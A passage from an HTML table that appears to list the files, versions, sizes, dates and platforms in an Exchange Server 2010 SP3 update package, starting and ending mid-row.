applicable</td></tr><tr><td>Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>14.3.470.0</td><td>126,600</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>14.3.470.0</td><td>27,272</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>14.3.470.0</td><td>155,272</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Interop.migbase.dll</td><td>14.3.470.0</td><td>57,184</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>14.3.470.0</td><td>48,776</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>14.3.470.0</td><td>32,904</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Interop.wuapilib.dll</td><td>14.3.470.0</td><td>77,656</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Iphgw2.dll</td><td>8.5.3.76</td><td>222,048</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Isgdi32.dll</td><td>8.5.3.76</td><td>1,406,312</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Isinteg.exe</td><td>14.3.470.0</td><td>456,648</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Kerbauth.dll</td><td>14.3.470.0</td><td>69,552</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Languageselection.aspx</td><td>Not applicable</td><td>5,421</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Largetoken_iis_ews.ps1</td><td>Not applicable</td><td>19,631</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Largetoken_kerberos.ps1</td><td>Not applicable</td><td>13,874</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Logoff.aspx</td><td>Not applicable</td><td>6,067</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Logon.aspx</td><td>Not applicable</td><td>13,479</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Lpsetupui.exe</td><td>14.3.470.0</td><td>241,288</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>17,581</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Mad.exe</td><td>14.3.470.0</td><td>1,371,592</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Madmsg.dll</td><td>14.3.470.0</td><td>108,456</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>38,829</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not applicable</td><td>34,405</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Mapiprotocolhandlerstub.dll</td><td>14.3.470.0</td><td>81,840</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbevent.dll</td><td>14.3.470.0</td><td>500,136</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbmsg.dll</td><td>14.3.470.0</td><td>231,856</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Mdbperf.dll</td><td>14.3.470.0</td><td>475,568</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Mdbperf.ini</td><td>Not applicable</td><td>724,818</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Mdbperfx.dll</td><td>14.3.470.0</td><td>476,080</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Mdbrest.dll</td><td>14.3.470.0</td><td>704,944</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbsz.dll</td><td>14.3.470.0</td><td>56,752</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Mdbtask.dll</td><td>14.3.470.0</td><td>455,624</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Meetingpage.aspx</td><td>Not applicable</td><td>12,927</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Messages.xsd</td><td>Not applicable</td><td>21,147</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>14.3.470.0</td><td>44,744</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.abproviders.ad.dll</td><td>14.3.470.0</td><td>48,840</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.exe</td><td>14.3.487.0</td><td>155,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>14.3.470.0</td><td>49,584</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>14.3.487.0</td><td>1,183,440</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>14.3.470.0</td><td>27,048</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>14.3.470.0</td><td>21,936</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>14.3.470.0</td><td>44,896</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>14.3.487.0</td><td>233,168</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>14.3.470.0</td><td>29,608</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>14.3.487.0</td><td>65,232</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.authorizationplugin.dll</td><td>14.3.487.0</td><td>78,544</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>14.3.470.0</td><td>22,656</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>14.3.487.0</td><td>282,320</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>14.3.470.0</td><td>264,328</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>14.3.470.0</td><td>22,448</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>14.3.470.0</td><td>40,584</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>14.3.470.0</td><td>82,864</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>14.3.487.0</td><td>3,321,560</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>14.3.470.0</td><td>966,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>14.3.487.0</td><td>1,969,880</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>14.3.470.0</td><td>101,064</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>14.3.487.0</td><td>184,528</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>14.3.470.0</td><td>20,168</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>14.3.470.0</td><td>24,488</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>14.3.470.0</td><td>29,104</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>14.3.470.0</td><td>57,032</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>14.3.487.0</td><td>57,040</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>14.3.487.0</td><td>1,052,368</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>14.3.470.0</td><td>36,272</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>14.3.470.0</td><td>182,184</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>14.3.470.0</td><td>163,528</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>14.3.487.0</td><td>429,776</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>14.3.470.0</td><td>21,424</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>14.3.470.0</td><td>3,469,144</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>14.3.470.0</td><td>83,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>14.3.470.0</td><td>921,432</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.filedistributionservice.eventlog.dll</td><td>14.3.470.0</td><td>28,592</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>14.3.487.0</td><td>220,880</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>14.3.487.0</td><td>184,016</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>14.3.470.0</td><td>98,136</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>14.3.487.0</td><td>5,287,632</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>14.3.470.0</td><td>28,592</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>14.3.470.0</td><td>52,936</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>14.3.470.0</td><td>19,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>14.3.470.0</td><td>827,080</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>14.3.470.0</td><td>28,288</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>14.3.470.0</td><td>167,768</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>14.3.470.0</td><td>233,312</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>14.3.470.0</td><td>29,616</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>14.3.470.0</td><td>114,528</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.exchangecertificate.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.exchangecertificateservicelet.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.extensibility.eventlog.dll</td><td>14.3.470.0</td><td>20,400</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.extensibility.internal.dll</td><td>14.3.470.0</td><td>446,304</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.groupmetrics.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.groupmetricsservicelet.dll</td><td>14.3.470.0</td><td>28,296</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.hathirdpartyreplication.dll</td><td>14.3.470.0</td><td>61,128</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.helpprovider.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4.eventlog.dll</td><td>14.3.470.0</td><td>23,984</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.imap4.exe</td><td>14.3.487.0</td><td>225,192</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.imap4service.exe</td><td>14.3.487.0</td><td>28,880</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.assistantsclientresources.dll</td><td>14.3.470.0</td><td>53,088</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.dll</td><td>14.3.487.0</td><td>1,470,160</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.common.mailtips.groupmetricsreaderinterop.dll</td><td>14.3.470.0</td><td>23,904</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.infoworker.eventlog.dll</td><td>14.3.470.0</td><td>58,800</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.infoworker.meetingvalidator.dll</td><td>14.3.487.0</td><td>131,008</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.instantmessaging.dll</td><td>14.3.470.0</td><td>69,320</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.irm.formprotector.dll</td><td>14.3.470.0</td><td>159,144</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.msoprotector.dll</td><td>14.3.470.0</td><td>59,312</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.irm.ofcprotector.dll</td><td>14.3.470.0</td><td>53,680</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.esebcli.dll</td><td>14.3.470.0</td><td>95,576</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.isam.interop.dll</td><td>14.3.470.0</td><td>363,352</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.live.domainservices.dll</td><td>14.3.470.0</td><td>135,000</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.common.dll</td><td>14.3.487.0</td><td>577,232</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.dll</td><td>14.3.487.0</td><td>364,240</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.eventlog.dll</td><td>14.3.470.0</td><td>30,640</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.provider.dll</td><td>14.3.487.0</td><td>179,920</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyclient.dll</td><td>14.3.487.0</td><td>126,672</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailboxreplicationservice.proxyservice.dll</td><td>14.3.487.0</td><td>122,576</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.mailsubmission.eventlog.dll</td><td>14.3.470.0</td><td>22,448</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.controlpanel.dll</td><td>14.3.496.0</td><td>3,650,440</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.controlpanelmsg.dll</td><td>14.3.470.0</td><td>34,736</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.detailstemplates.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.dll</td><td>14.3.487.0</td><td>12,291,792</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.edge.systemmanager.dll</td><td>14.3.470.0</td><td>77,512</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.nativeresources.dll</td><td>14.3.470.0</td><td>208,328</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.management.powershell.support.dll</td><td>14.3.487.0</td><td>110,288</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.publicfolders.dll</td><td>14.3.470.0</td><td>151,240</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.snapin.esm.dll</td><td>14.3.487.0</td><td>2,563,792</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.management.systemmanager.dll</td><td>14.3.470.0</td><td>1,281,736</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementgui.dll</td><td>14.3.470.0</td><td>5,418,696</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.managementmsg.dll</td><td>14.3.470.0</td><td>33,712</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagesecurity.dll</td><td>14.3.470.0</td><td>93,832</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagesecurity.messagesecuritymsg.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.edgeagents.dll</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.eventlog.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.messagingpolicies.journalagent.dll</td><td>14.3.487.0</td><td>114,600</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.redirectionagent.dll</td><td>14.3.487.0</td><td>31,960</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rmsvcagent.dll</td><td>14.3.487.0</td><td>138,960</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.rules.dll</td><td>14.3.487.0</td><td>179,920</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.messagingpolicies.transportruleagent.dll</td><td>14.3.487.0</td><td>32,976</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.mobiledriver.dll</td><td>14.3.487.0</td><td>155,344</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.monitoring.eventlog.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.monitoring.exe</td><td>14.3.487.0</td><td>73,424</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.net.dll</td><td>14.3.470.0</td><td>2,186,952</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabauthmodule.dll</td><td>14.3.470.0</td><td>25,736</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.oabmaintenance.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.oabmaintenanceservicelet.dll</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3.eventlog.dll</td><td>14.3.470.0</td><td>22,984</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.pop3.exe</td><td>14.3.487.0</td><td>98,000</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.pop3service.exe</td><td>14.3.487.0</td><td>28,880</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.popimap.core.dll</td><td>14.3.487.0</td><td>159,440</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.powershell.configuration.dll</td><td>14.3.487.0</td><td>200,400</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.powershell.rbachostingtools.dll</td><td>14.3.487.0</td><td>81,616</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.protectedservicehost.exe</td><td>14.3.487.0</td><td>32,464</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.provisioningagent.dll</td><td>14.3.487.0</td><td>192,208</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.pst.dll</td><td>14.3.470.0</td><td>179,848</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.routingtablelogparser.dll</td><td>14.3.470.0</td><td>110,216</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpc.dll</td><td>14.3.470.0</td><td>873,672</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.coexistence.dll</td><td>14.3.470.0</td><td>24,200</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>14.3.487.0</td><td>126,672</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>14.3.470.0</td><td>73,344</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>14.3.487.0</td><td>437,968</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>14.3.470.0</td><td>601,736</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>14.3.487.0</td><td>110,504</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>14.3.487.0</td><td>65,232</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>14.3.470.0</td><td>29,104</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>14.3.470.0</td><td>26,976</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.exsearch.exe</td><td>14.3.487.0</td><td>417,488</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.exsearchmsg.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.native.dll</td><td>14.3.470.0</td><td>138,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>14.3.487.0</td><td>192,208</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>14.3.470.0</td><td>20,400</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>14.3.487.0</td><td>35,752</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>14.3.487.0</td><td>3,145,424</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>14.3.470.0</td><td>32,688</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common.dll</td><td>14.3.470.0</td><td>454,280</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.exsetupuihelper.dll</td><td>14.3.470.0</td><td>216,712</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>